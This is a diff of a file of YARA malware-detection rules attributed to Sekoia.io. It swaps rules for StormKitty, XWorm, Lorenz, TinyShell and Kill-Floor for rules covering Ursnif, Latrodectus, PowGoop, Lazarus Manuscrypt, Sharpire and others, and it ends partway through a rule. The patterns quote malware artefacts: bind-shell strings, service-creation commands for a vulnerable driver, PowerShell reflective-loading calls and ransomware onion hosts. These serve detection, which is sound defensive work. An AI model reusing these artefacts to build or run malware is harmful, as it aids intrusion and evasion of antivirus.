-		id = "e9d28dcb-b4b1-4d66-b225-ed0925f307d9"
-		date = "2024-09-09"
+		id = "73e63481-8a89-4342-87f0-8dc7ad459396"
+		date = "2024-12-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharpnbtscan_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ursnif_ldr4.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "adc19140e84c4aa3433b8ae4096355e384bbd106326ed56b54fb44a86fd9fbc6"
+		logic_hash = "6fe237c6370a1b99bddb7bee4170d29cbb780dc445f5d5039201ddbaf05c63db"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+]Udp client will stop in 10 s ..." ascii wide
-		$ = "[*]Stop udp client ..." ascii wide
-		$ = "[*]Start udp client ..." ascii wide
-		$ = "[+] ip range {0} - {1} " ascii wide
+		$str1 = "LOADER.dll" fullword
+		$str2 = "DllRegisterServer" fullword
+		$str3 = ".bss" fullword
+		$x64_code1 = { 3D 2E 62 73 73 74 0A 48 83 C7 28 }
+		$x64_code2 = { 8B 17 48 83 C7 04 8B CA 8b C2 23 CB 0B C3 F7 D1 23 C8 41 2B CA 44 8B D2 41 89 08 41 8B CB 49 83 C0 04 83 E1 07 FF C1 41 D3 C2 41 83 EB 04 79 }
+		$x64_code3 = { 41 0F B6 01 49 FF C1 8B C8 8B D0 83 E1 03 C1 E1 03 D3 E2 44 03 C2 41 83 C2 FF 75 }
+		$x64_code4 = { 45 8D 45 08 48 8D 8C 24 [4] BA 30 00 FE 7F E8 }
+		$x64_code5 = { 48 8D 8C 24 [4] BA 30 00 FE 7F 41 B8 08 00 00 00 E8 }
+		$x86_code1 = { 81 F9 2E 62 73 73 74 09 83 C6 28 }
+		$x86_code2 = { 8B 06 8B D0 23 55 0C 8B D8 0B 5D 0C F7 D2 23 D3 2B D1 8A 4D 08 80 E1 07 83 C6 04 89 17 83 C7 04 FE C1 D3 C0 83 6D 08 04 8B C8 79 }
+		$x86_code3 = { 8A 0E 0F B6 D1 8B CA 83 E1 03 C1 E1 03 D3 E2 46 03 C2 4F 75 }
+		$x86_code4 = { 6A 08 8D 45 F8 68 30 00 FE 7F 50 E8 }
 
 	condition:
-		uint32be( 0 ) == 0x5A4D and all of them
+		true and 5 of them
 }
-rule SEKOIA_Infostealer_Win_Stormkitty : FILE
+rule SEKOIA_Latrodectus_Br4_Js_Dropper
 {
 	meta:
-		description = "Finds StormKitty samples (or their variants) based on specific strings"
+		description = "Detect the JS script used to drop Latrodectus"
 		author = "Sekoia.io"
-		id = "5014d2e5-af5c-4800-ab1e-b57de37a2450"
-		date = "2023-03-29"
+		id = "042a598d-66fa-4994-a793-228355abd5dd"
+		date = "2024-06-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stormkitty.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/latrodectus_br4_js_dropper.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "57a4603faf6af9742db79f9bc8751f3a5c091b6271998434f0a3b9f5c30cb1e8"
+		logic_hash = "a835bd9a9ad68fd2f285ec5c04a5c78ba5ca85381ff30048ac375bef220fd72f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$sk01 = "LimerBoy/StormKitty" ascii wide
-		$sk02 = "StormKitty-Latest.log" wide
-		$sk03 = "StormKitty.exe" ascii
-		$sk04 = "Debug\\StormKitty.pdb" ascii
-		$sk05 = "StormKitty.Implant" ascii
-		$str01 = "set_sUsername" ascii
-		$str02 = "set_sIsSecure" ascii
-		$str03 = "set_sExpMonth" ascii
-		$str04 = "WritePasswords" ascii
-		$str05 = "WriteCookies" ascii
-		$str06 = "sChromiumPswPaths" ascii
-		$str07 = "sGeckoBrowserPaths" ascii
-		$str08 = "Username: {1}" wide
-		$str09 = "Password: {2}" wide
-		$str10 = "encrypted_key\":\"(.*?)\"" wide
+		$s1 = " installer.InstallProduct(msiPath);" ascii
+		$s2 = "new ActiveXObject(\"WindowsInstaller.Installer\");" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( 1 of ( $sk* ) and 3 of ( $str* ) ) or 7 of ( $str* ) )
+		all of them
 }
-rule SEKOIA_Xworm_Dotnet_Injector
+rule SEKOIA_Apt_Muddywater_Powgoop_Decode_Loop : FILE
 {
 	meta:
-		description = ".NET injector used by XWorm TA"
+		description = "Detects the loop used in PowGoop and its loader"
 		author = "Sekoia.io"
-		id = "50581a9d-afc3-43da-9e34-3a553cbd01b4"
-		date = "2022-12-02"
+		id = "644ed1c4-e0e1-496e-9efc-7d9e15565f7b"
+		date = "2022-01-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/xworm_dotnet_injector.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_powgoop_decode_loop.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4777edacf4719e602ae1fb7204ea97cd594277faa1c2b7ad430066ad82b40768"
+		logic_hash = "1d60f53014fb1934a85a573856244431c8f565c2f024511991817e6235566815"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$first_payload = "jBGIcSr2fKhj1ZT2YNLBTcYYeAw/vWUT98dCA/H6hpI+dY+lkoSe1ATx7XEIXKtAdTSwl1PKhNROoxstXsnsHTZbS2ikRLv6lmHd5v09DltsPeXIOA789wZC8qR1OScJFohGxuWQSQ8K2TAFUQAntIFdX+Om1QZUARdDnb4f+P8VFucU9avWD75yK1IcTDDDEYwvm/rwUYTqWitcrfIY+aFcgQwyvEzkN7Pbsah4Kts+XmK0C3TzlnDd2mz6TdsPphGbBxcbBdZGMTyzunZUEKRYea7xM6u+az9v7m6a1G6vhsSqz4C/nleDmzL2dIVnVR6Ni6+0hlExcP" wide
-		$rijndael_key1 = { e5 a0 b1 e8 89 be e8 8e 8e e4 bb a3 e5 ba b5 e9 85 8d e7 89 b9 e6 b0 8f e5 85 8b e9 9b 99 e8 89 be e5 8b 92 e6 8b 89 e6 a1 83 e9 ad 9a e6 88 91 e6 96 af e6 a1 83 e5 ba 95 e5 be b7 }
-		$rijndael_key2 = { e7 9b 9f e7 91 aa e6 a1 83 e9 87 91 e5 90 89 e9 97 95 e5 a0 b1 e9 9b 99 e9 97 95 e5 96 ac e5 ba 95 e5 a0 b1 e5 be b7 e6 8b 89 e5 92 8c e7 a0 b4 e7 88 be e9 a6 ac e6 88 91 e5 8a a0 }
-		$rijndael_key3 = { e6 9b b2 e6 b0 8f e5 ba b5 e5 a3 ab e9 97 95 e5 be b7 e6 96 af e8 9b 8b }
-		$s1 = "fullofdick"
-		$s2 = "holdmeback"
-		$s3 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" wide
+		$s1 = "System.Collections.Generic.List[System.Object]" ascii wide
+		$s2 = "$d.Add($in[$i]);" ascii wide
+		$s3 = "[System.Convert]::FromBase64String(" ascii wide
 
 	condition:
-		($first_payload and all of ( $rijndael_key* ) ) or 2 of ( $s* )
+		filesize < 1MB and $s2 in ( @s1 .. @s1 + 400 ) and $s3 in ( @s1 .. @s1 + 400 )
 }
-rule SEKOIA_Apt_Cloudatlas_Powertunnel_Loader
+rule SEKOIA_Keylogger_Win_Donot
 {
 	meta:
-		description = "Detects the Powershell loader of the PowerTunnel dll"
+		description = "Detect the DoNot's keylogger malware"
 		author = "Sekoia.io"
-		id = "f2333b8a-99e9-4f28-b0d8-4f7dc4c648c5"
-		date = "2022-11-29"
+		id = "4f67dda7-da68-4496-a8b4-a8a769ddd763"
+		date = "2023-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powertunnel_loader.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/keylogger_win_donot.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "742374ad22d9333ef071fe95058f28ae00325cca833b557481ef5d453b3a4977"
+		logic_hash = "eb935f84335e934346511b4108f70df469deef6ecaaba809c144197c04a28f64"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "New-Object System.IO.Compression.GzipStream(" ascii fullword
-		$ = "[System.Reflection.Assembly]::Load("
-		$ = ".ReadBytes("
-		$ = ".Service]::StartMain"
+		$ = "iwrct2mTFAu0ew1nyqQgoaNtNo0+52R0XiTKbwy1W48Bn1b2YcNt0+tptyY6oGoAeLDGekM/yHcdikNGi8bLqkUQ8CIdkWeT3QiympOTfjs="
+		$ = "ZmVwZW9kbWZ2c24ucHMuZ3h4LngweXBvdWpkYm1qcXE7YnFmVXp1LmZvb3VEcA=="
 
 	condition:
-		uint8be( 0 ) == 0x24 and all of them
+		1 of them
 }
-rule SEKOIA_Ransomware_Win_Lorenz : FILE
+rule SEKOIA_Dropper_Mac_Lazarus_Manuscrypt : FILE
 {
 	meta:
-		description = "Detect the Lorenz ransomware"
+		description = "MacOS Manuscrypt dropped by TraderTraitor"
 		author = "Sekoia.io"
-		id = "6936cc61-efe5-4d13-b76f-e808ab331457"
-		date = "2022-02-10"
+		id = "6138bd0c-1fcf-4586-b2b6-29955c7d6266"
+		date = "2022-04-19"
 		modified = "2024-12-19"
-		reference = "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_lorenz.yar#L1-L27"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dropper_mac_lazarus_manuscrypt.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "355de0f172c9e877bbca7f75c0bfb07d83ae7f43e7674a7f84c4e4d519dfa7c0"
+		hash = "dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156"
+		hash = "9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa"
+		logic_hash = "dbe75a34f91906fc275c04af0fc068923993bab37a7574b3fe38733d87f31835"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".onion" ascii
-		$s2 = "---===Lorenz. Welcome. Again. ===--" ascii
-		$s3 = ".Lorenz.sz40" ascii
-		$url1 = "egypghtljedbs3x3ui45tfhosakzb376epl7baq2ruzfyewcypswhgqd.onion" ascii
-		$url2 = "lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion" ascii
-		$url3 = "vsoonropylvbfqnq2urk7uhaxn7afiwgldnj3ntc743awigojm4p7lid.onion" ascii
-		$url4 = "kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii
-		$url5 = "vldkrmiqriwlgm2wuxg42nvc6kqsdzsdhsybn27hyn34d66465fxz7id.onion" ascii
+		$ = "networksetup -getwebproxy '%s'" ascii
+		$ = "Cookie: _ga=%s%02d%d%d%02d%s" ascii
+		$ = "networksetup -listallnetworkservices" ascii
+		$ = "gid=%s%02d%d%03d%s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 900KB and filesize < 1200KB and ( all of ( $s* ) or 1 of ( $url* ) )
+		uint32( 0 ) == 0xFEEDFACF and all of them
 }
-rule SEKOIA_Unknown_Quad7_Wildcard_Login : FILE
+rule SEKOIA_Apt_Luckymouse_Rshell_Strings_All_Platform : FILE
 {
 	meta:
-		description = "Detects the (x|r|a)login bind shells"
+		description = "Detects LuckyMouse RShell Mach-O implant"
 		author = "Sekoia.io"
-		id = "01510244-0795-4299-aa66-056a2b4682e7"
-		date = "2024-07-18"
+		id = "e79a5ee1-96b3-4643-ab11-0b1095e96488"
+		date = "2022-08-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unknown_quad7_wildcard_login.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_luckymouse_rshell_strings_all_platform.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "4d9067e7cf517158337123a30a9bd0e3"
-		hash = "43ea387b8294cc4d0baaef6d26ff7c72"
-		hash = "777d6f907da38365924a0c2a12e973c5"
-		hash = "8542a3cbe232fe78baa0882736c61926"
-		hash = "1b08725acc371f6b7d05bb72d0c2d759"
-		logic_hash = "72de6fe656313bdd4f4b092ceca7248c67b8047c224104cd569dff7af1d86135"
+		logic_hash = "ef923b6633a2b7dfa645a31c7c2d0e00872ebad6ec7748568c2b306c29b6b29b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254500,57 +254502,75 @@ rule SEKOIA_Unknown_Quad7_Wildcard_Login : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$string1 = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e }
-		$string2 = { 2f 62 69 6e 2f 73 68 00 2d 63 00 65 78 69 74 20 30 }
+		$ = { 6C 6F 67 69 6E 00 68 6F
+        73 74 6E 61 6D 65 00 6C
+        61 6E 00 75 73 65 72 6E
+        61 6D 65 00 76 65 72 73
+        69 6F 6E }
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 180KB and @string2 - @string1 < 3400
+		filesize < 1MB and all of them
 }
-rule SEKOIA_Ransomware_Win_Honkai_Jan2023 : FILE
+
+rule SEKOIA_Loader_Win_Dodgebox
 {
 	meta:
-		description = "Rule to detect Honkai ransomware samples."
+		description = "Detect the DodgeBox malware using several criteria"
 		author = "Sekoia.io"
-		id = "6ef91cb5-e122-4f91-bc15-3813b8f91cbf"
-		date = "2023-02-13"
+		id = "8d5f94f3-1add-4f34-ba9e-f8f576c4e5b8"
+		date = "2024-07-15"
+		modified = "2024-12-19"
+		reference = "https://www.zscaler.com/blogs/security-research/dodgebox-deep-dive-updated-arsenal-apt41-part-1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_dodgebox.yar#L4-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
+		logic_hash = "e859da15a065454d273c4040b4e3409c3046cbcee135497bdcce6cff620c3cfb"
+		score = 75
+		quality = 80
+		tags = ""
+		version = "1.0"
+		classification = "TLP:CLEAR"
+		hash1 = "c6a3a1ea84251aed908702a1f2a565496d583239c5f467f5dcd0cfc5bfb1a6db"
+		hash2 = "33fd050760e251ab932e5ca4311b494ef72cee157b20537ce773420845302e49"
+
+	condition:
+		pe.imphash( ) == "aeea1135af87e6b6b23fa7da995967ea" or hash.md5 ( pe.rich_signature.clear_data ) == "1c850cf955b35f60ee6c12d01161d95d" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "4a80edcce2a5ac85c3f849172ee89c0f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "53781057440f51882c38d3a9ef611775" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "801b286d84a97fe919721843ab77210d" )
+}
+rule SEKOIA_Apt_Micdown_Encrypted_Configuration : FILE
+{
+	meta:
+		description = "Encrypted C2 configuration of micDown"
+		author = "Sekoia.io"
+		id = "9567d68b-05d1-4d41-b87f-c8691ee689cd"
+		date = "2023-08-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_honkai_jan2023.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_micdown_encrypted_configuration.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "19f831f77e043f11b790b7f24e9f585e4986d9af6580bae7c344b7960f2f0965"
+		logic_hash = "9b80bd284f9aa9e4073bdead7bb0c5412ec1809c36a85dfd35d9ea7ac62da8a3"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "989cf96da60d9ebfb6f364717b4f0cae1667fdc7f9d89f77acc254ab47d439e6"
 
 	strings:
-		$s1 = "DP_Main.exe" ascii wide
-		$s2 = "DP_MainForm" ascii wide
-		$s3 = "DP_Main" ascii wide
-		$s4 = "#DECRYPT MY FILES#.html" ascii wide
-		$s5 = "/api/Encrypted.php" ascii wide
-		$s6 = "http://upload.paradisenewgenshinimpact.top:2095" ascii wide
-		$s7 = "main@paradisenewgenshinimpact.top" ascii wide
-		$s8 = ".honkai" ascii wide
+		$s1 = {?? [20] 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 84 36}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 6 of them
+		filesize == 66 and all of them
 }
-rule SEKOIA_Infostealer_Win_Enigma_Loader_Module : FILE
+rule SEKOIA_Backdoor_Powershellempire_Sharpire : FILE
 {
 	meta:
-		description = "Find loader module of Enigma Stealer based on specific strings"
+		description = "Detect Sharpire version of Empire"
 		author = "Sekoia.io"
-		id = "664fe8de-b406-4d63-9a4b-1c350b444f01"
-		date = "2023-01-30"
+		id = "fed21fbd-52ed-4649-a1ff-56eae57fc9ef"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_enigma_loader_module.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_sharpire.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "f1623c2f7c00affa3985cf7b9cdf25e39320700fa9d69f9f9426f03054b4b712"
-		logic_hash = "f5485b14291acc299d66b72aefd2d5e558d82f6a90450d293eb147f05423f2d8"
+		logic_hash = "a4da54a16ee1ac3dea3b3b5a5983638ea28fd1e6d580cd48db595f15a92817a1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254558,32 +254578,27 @@ rule SEKOIA_Infostealer_Win_Enigma_Loader_Module : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Enigma.Loader.Driver_x64.dll" ascii
-		$str02 = "C:\\projects\\driver\\Driver\\x64\\Release\\driver.pdb" ascii
-		$str03 = "/getFile?file_id=" ascii
-		$str04 = "/file/bot" ascii
-		$str05 = "Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator." wide
-		$str06 = "[GetTgFileById][GetTgRequest] reply is NULL" wide
-		$str07 = "Telegram request failed" wide
-		$str08 = "Vul driver data destroyed before unlink" wide
-		$str09 = "GetExportAddress hash not found: %x" wide
-		$str10 = "\\REGISTRY\\MACHINE\\HARDWARE\\RESOURCEMAP\\PnP Manager\\PnpManager" wide
+		$ = "GetAgentID" ascii wide
+		$ = "SetAgentID" ascii wide
+		$ = "StartAgentJob" ascii wide
+		$ = "get_JobThread" ascii wide
+		$ = "GetStagerURI" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 1MB
 }
-rule SEKOIA_Tool_Petitpotato : FILE
+rule SEKOIA_Tool_Dynamicwrapper_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects DynamicWrapperX"
 		author = "Sekoia.io"
-		id = "72808202-a124-478e-bc60-59d35824b948"
-		date = "2023-08-23"
+		id = "bbfad0a8-8b86-47c7-bf70-0a3f6859d64b"
+		date = "2023-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_petitpotato.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_dynamicwrapper_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "93a46c7765ad9f18c2176b98c91edf97827707ffdefcedc40078c87c30343508"
+		logic_hash = "fad5fec74dc3efdd7fc67ef1c6373957df4ee564f3fe6333b924b236ea7458d9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254591,30 +254606,25 @@ rule SEKOIA_Tool_Petitpotato : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s2 = "set_FileName" ascii wide
-		$s3 = "VarFileInfo" ascii wide
-		$s4 = "PetitPotato.exe" ascii wide
-		$s5 = "0.0.0.0" ascii wide
+		$ = "Software\\Classes\\DynamicWrapperX" ascii
+		$ = "DllRegisterServer" ascii
+		$ = "GoLink, GoAsm" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
 }
-rule SEKOIA_Malware_Tinyshell_Strings : FILE
+rule SEKOIA_Tool_Sy_Runas : FILE
 {
 	meta:
-		description = "Detects TinyShell based on strings"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "51fe9986-cb33-4802-bb8d-fe3d4cdfdcc8"
-		date = "2024-09-04"
+		id = "cb1f3707-6716-49b5-9fe0-45c5baf2e491"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_tinyshell_strings.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sy_runas.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "fffc89ebbe6ea37072077996e27f86dd"
-		hash = "59a97d4fbd3a54e991dc7e1f0451acf5"
-		hash = "d7ee59eab7f703bfaf1002a39b05c7b9"
-		hash = "3f2dfe47d4563919d889132b2759fd9c"
-		logic_hash = "18d10e7e6f0ba8a9ea7fa8446a930f84ce5eb2f3a022ce3dc62bc3f8fd5699e1"
+		logic_hash = "b606f921b0ff6adf0e6979d43be0ddf77e2967e703562f1dea4406d1f5b3f5fd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254622,91 +254632,117 @@ rule SEKOIA_Malware_Tinyshell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "_tsh_get_file"
-		$ = "_tsh_put_file"
-		$ = "_tsh_runshell"
-		$ = "Authentication failed."
-		$ = "pel_send_msg"
-		$ = "exec bash --login"
+		$s1 = "Sy_Runas.exe" ascii wide
+		$s2 = "password *.exe" ascii wide
+		$s3 = "This tools just work on webshell" ascii wide
+		$s4 = "Code By slls124@gmail.com" ascii wide
 
 	condition:
-		3 of them and filesize < 150KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
 }
-rule SEKOIA_Killfloor_Avkiller_Strings : FILE
+rule SEKOIA_Malware_Win_Lyceum_Maldoc_Macro_20220613
 {
 	meta:
-		description = "Kill-Floor strings"
+		description = "Detect the macro contained in Lyceum maldoc to deploy its malware"
 		author = "Sekoia.io"
-		id = "ae6908c3-27d4-4d2c-af21-a9548dfcd487"
-		date = "2024-10-29"
+		id = "3046bffd-261f-4d5b-9015-f2e5fc31c9c9"
+		date = "2022-06-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/killfloor_avkiller_strings.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_win_lyceum_maldoc_macro_20220613.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "9f16176ac20f7855fa960d321e156d69"
-		hash = "4b019e9ed2de734e242602abce06f7c1"
-		hash = "81ae32d9de8fd21acfc61d62f3292277"
-		hash = "7cb2c4560e02c25463ec70e222ad0018"
-		logic_hash = "e89d0936612104f98b7f56dca09702f31f07868f239c2d11dd738e015e757b3a"
+		logic_hash = "a9f4957e8198b4cb2229913a405b3e0fc97cbd3598bb583dbfdaf56ca278d4cb"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "sc create aswArPot.sys type=kernel binpath=%s" ascii
-		$ = "sc start aswArPot.sys" ascii
-		$ = "[*] Enumerating target processes" ascii
-		$ = "[*] Entering main loop... " ascii
-		$ = "aswArPot.pdb" ascii
-		$ = "SeConvertStringSecurityDescriptorToSecurityDescriptor" wide
+		$ = "ActiveDocument.InlineShapes(i).PictureFormat.Brightness = 0.5" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and filesize > 20KB and 6 of them
+		all of them
 }
-rule SEKOIA_Hacktool_Win_Powertool : FILE
+rule SEKOIA_Backdoor_Mul_Sparkrat : FILE
 {
 	meta:
-		description = "Detect PowerTool based on strings"
+		description = "Detect SparkRAT using string found in the source code"
 		author = "Sekoia.io"
-		id = "ab8355b8-322d-41a4-82f0-43896c96b9bc"
-		date = "2022-09-09"
+		id = "cd818207-f8ec-41fa-abef-c29d481c7897"
+		date = "2023-01-30"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_powertool.yar#L1-L21"
+		reference = "https://github.com/XZB-1248/Spark"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_mul_sparkrat.yar#L1-L59"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "aeccba821e528ca03abc8b50362d450ba2c12ab443454faf5b2809aecd163648"
+		logic_hash = "377fc647e9a7ee6d5ad69370d5a2264302215401417951432f904c25e26169b9"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "C:\\dev\\pt64_en\\Release\\PowerTool.pdb" ascii
-		$str1 = "Chage language nedd to restart PowerTool" ascii
-		$str2 = "(http://twitter.com/ithurricanept && https://www.linkedin.com/in/powertool)" wide
-		$str3 = "Infected=Before Fix, whether to back up the drive files will be fixed?" wide
-		$str4 = "Infected?-Are you sure to Fix the Infected Driver File?" wide
-		$str5 = "shellex\\ContextMenuHandlers\\PowerTool" wide
-		$str6 = "[PowerTool] name=%s, size=%d, %d" ascii
+		$ = "2006/01/02 15:04:05" wide ascii
